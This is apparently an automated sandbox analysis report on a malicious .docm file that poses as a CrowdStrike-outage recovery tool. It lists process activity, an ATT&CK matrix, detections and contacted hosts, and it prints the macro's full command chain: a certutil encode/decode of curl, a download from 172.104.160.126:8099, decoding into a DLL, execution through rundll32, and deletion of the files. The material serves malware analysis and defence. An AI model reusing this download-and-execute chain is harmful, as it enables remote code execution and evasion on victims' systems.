Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr	Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: s Hyper-V settings.
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V Settings
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_000000013F4DAFA0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		22_2_000000013F35AFA0

HIPS / PFW / Operating System Protection Evasion

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA stomping: true

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c xcopy c:\windows\system32\curl.exe c:\users\user\appdata\local\temp & certutil -f -encode c:\users\user\appdata\local\temp\curl.exe c:\users\user\appdata\local\temp\curl.txt & certutil -f -decode c:\users\user\appdata\local\temp\curl.txt c:\users\user\appdata\local\temp\curl.exe & c:\users\user\appdata\local\temp\curl.exe http://172.104.160.126:8099/payload2.txt -o c:\users\user\appdata\local\temp\mscorsvc.txt & certutil -f -decode c:\users\user\appdata\local\temp\mscorsvc.txt c:\users\user\appdata\local\temp\mscorsvc.dll & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\curl.txt & del c:\users\user\appdata\local\temp\curl.exe & del c:\users\user\appdata\local\temp\mscorsvc.txt & start " " rundll32 c:\users\user\appdata\local\temp\mscorsvc.dll,dllmain & exit

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_000000013F4DBAFC

Source: C:\Windows\System32\certutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	7_2_000000013F4A2B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	7_2_000000013F4CF964
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	22_2_000000013F322B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	22_2_000000013F34F964

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	32 Scripting	Valid Accounts	13 Command and Scripting Interpreter	32 Scripting	11 Process Injection	13 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Obfuscated Files or Information	1 DLL Side-Loading	11 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	14 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	26%	ReversingLabs	Script-Macro.Downloader.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\curl.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://aka.ms/WRH	0%	Avira URL Cloud	safe
https://curl.se/libcurl/c/curl_easy_setopt.html	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.htmlD	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html	0%	Avira URL Cloud	safe
https://curl.se/	0%	Avira URL Cloud	safe
http://172.104.160.126:80X99	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/	0%	Avira URL Cloud	safe
http://172.104.160.126:8099	0%	Avira URL Cloud	safe
https://aka.ms/vs/17/release/vc_redist.x64.exe	0%	Avira URL Cloud	safe
http://172.104.160.	0%	Avira URL Cloud	safe
https://curl.se/docs/copyright.html	0%	Avira URL Cloud	safe
https://curl.se/P	0%	Avira URL Cloud	safe
https://curl.se/docs/sslcerts.html	0%	Avira URL Cloud	safe
https://curl.se/docs/hsts.html#	0%	Avira URL Cloud	safe
https://azure.status.microsoft/status	0%	Avira URL Cloud	safe
https://curl.se/docs/http-cookies.html#	0%	Avira URL Cloud	safe
https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	0%	Avira URL Cloud	safe
https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html	0%	Avira URL Cloud	safe
http://172.104.160.126:8099/payload2.txt	0%	Avira URL Cloud	safe
https://curl.se/docs/sslcerts.htmlcurl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sb-ssl.l.google.com	172.217.168.14	true	false	unknown
www.google.com	142.250.203.100	true	false	unknown
sb-ssl.google.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sb-ssl.google.com/safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe	document.xml	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.htmlD	xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://curl.se/	curl.exe	false	Avira URL Cloud: safe	unknown
https://aka.ms/WRH	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
https://curl.se/libcurl/c/curl_easy_setopt.html	curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.126:8099	vbaProject.bin	true	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.126:80X99	vbaProject.bin	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/copyright.html	curl.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html#	curl.exe	false	Avira URL Cloud: safe	unknown
https://azure.status.microsoft/status	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html	~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.	~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	true	Avira URL Cloud: safe	unknown
https://curl.se/P	xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html#	curl.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/sslcerts.html	curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://172.104.160.126:8099/payload2.txt	curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://curl.se/docs/sslcerts.htmlcurl	curl.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.14	sb-ssl.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.203.100	www.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1478411
Start date and time:	2024-07-22 15:50:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Detection:	MAL
Classification:	mal88.expl.evad.winDOCM@51/26@4/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 324
Cookbook Comments:	Found application associated with file extension: .docm Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Browse link: https://go.microsoft.com/fwlink/?linkid=2280386 Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.217.168.3, 173.194.79.84, 172.217.168.46, 34.104.35.123, 184.28.89.167, 184.30.24.206, 142.250.203.99
Excluded domains from analysis (whitelisted): accounts.google.com, clientservices.googleapis.com, e11290.dspg.akamaiedge.net, clients2.google.com, go.microsoft.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, edgedl.me.gvt1.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, go.microsoft.com.edgekey.net, update.googleapis.com, download.microsoft.com, clients.l.google.com
Execution Graph export aborted for target curl.exe, PID 2432 because there are no executed function
Execution Graph export aborted for target curl.exe, PID 3136 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	https://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==	Get hash	malicious	Unknown	Browse
	ATT96885.htm	Get hash	malicious	HTMLPhisher	Browse
	https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.html	Get hash	malicious	CVE-2024-21412	Browse
	lerpdf.45004.exe	Get hash	malicious	Unknown	Browse
